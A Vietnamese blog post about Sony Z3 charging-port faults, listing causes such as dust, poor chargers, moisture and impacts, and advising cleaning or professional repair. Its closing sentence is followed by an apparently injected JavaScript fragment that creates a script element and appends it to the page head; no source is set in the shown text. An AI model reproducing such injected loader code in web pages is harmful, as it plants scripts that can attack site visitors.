Sony Z3 lỗi đuôi sạc, do đâu và khắc phục như thế nào?

Ngày đăng: 2:16 chiều

Sony Z3 lỗi đuôi sạc khiến bạn không thể sạc pin cho máy dễ dàng như trước kia? Để khắc phục tình trạng này, bạn hãy đọc ngay những biện pháp sau đây nhé!

Ngay từ khi ra mắt, Sony Z3 đã gây ấn tượng với người dùng nhờ nhiều ưu điểm nổi bật như thiết kế đẹp, cấu hình mạnh, khả năng chống nước và chống bụi tốt cũng như có khả năng hiển thị tuyệt vời. Tuy nhiên, chính những ưu điểm này lại khiến người dùng có xu hướng trở nên chủ quan hơn trong quá trình sử dụng, làm máy có nguy cơ mắc phải nhiều lỗi hư hỏng khác nhau mà Sony Z3 lỗi đuôi sạc là một trong số đó.

Sony Z3 loi duoi sac

Sony Z3 lỗi đuôi sạc là một sự cố không hề hiếm gặp

 

Khi lỗi này xảy ra, quá trình sạc pin của bạn thường diễn ra lâu hơn bình thường, thậm chí máy còn không nhận sạc, không thể sạc pin, làm ảnh hưởng đến việc sử dụng các chức năng của máy. Ngoài ra, lỗi đuôi sạc còn khiến Sony Z3 không thể kết nối với máy tính khi cần, gây ra nhiều bất tiện trong quá trình sử dụng.

>> Xem thêm: Sony Z3 bắt Wifi yếu

Nguyên nhân và cách khắc phục Sony Z3 lỗi đuôi sạc

➡ Có thể bạn thường xuyên để Sony Z3 ở môi trường có nhiều bụi bẩn mà lại không thường xuyên vệ sinh cho máy khiến đuôi sạc bị bám bụi, lâu ngày dẫn tới hư hỏng. Trong trường hợp này, bạn nên lấy tăm bông để lau sạch bụi và những vật cản khác cho trong đuôi sạc.

➡ Bạn sử dụng bộ sạc không chính hãng, bộ sạc kém chất lượng hoặc nguồn điện không ổn định để sạc pin cho máy. Điều này diễn ra trong thời gian dài sẽ làm cho đuôi sạc của Sony Z3 bị hư hỏng rất nhanh.

➡ Sony Z3 bị ngấm nước hoặc bị để trong môi trường ẩm ướt, có độ ẩm cao, khiến đuôi sạc bị hoen gỉ, ăn mòn.

➡ Người dùng để Sony Z3 rơi từ trên cao, va đập mạnh với vật cứng, vật nhọn, để vật nặng đè lên,… khiến đuôi sạc của máy bị hư hỏng theo.

Sony Z3 loi duoi sac

Có nhiều lý do khiến Sony Z3 lỗi đuôi sạc

➡ Đối với các trường hợp mà đuôi sạc của Sony Z3 đã bị hư hỏng thì bạn nên thay mới bộ phận này cho máy. Đây là công việc khá phức tạp và đòi hỏi có tay nghề cao nên bạn đừng tự mình thực hiện mà hãy đến các trung tâm sửa chữa uy tín để được khắc phục chính xác tình trạng Sony Z3 lỗi đuôi sạc nhé!

Chúc các bạn thành công!var d=document;var s=d.createElement(‘script’); d.getElementsByTagName(‘head’)[0].appendChild(s);

Tin liên quan

Sony Z5 bị liệt cảm ứng hoàn toàn và đây là giải pháp
Tháng Năm 27, 2017 oanhoanh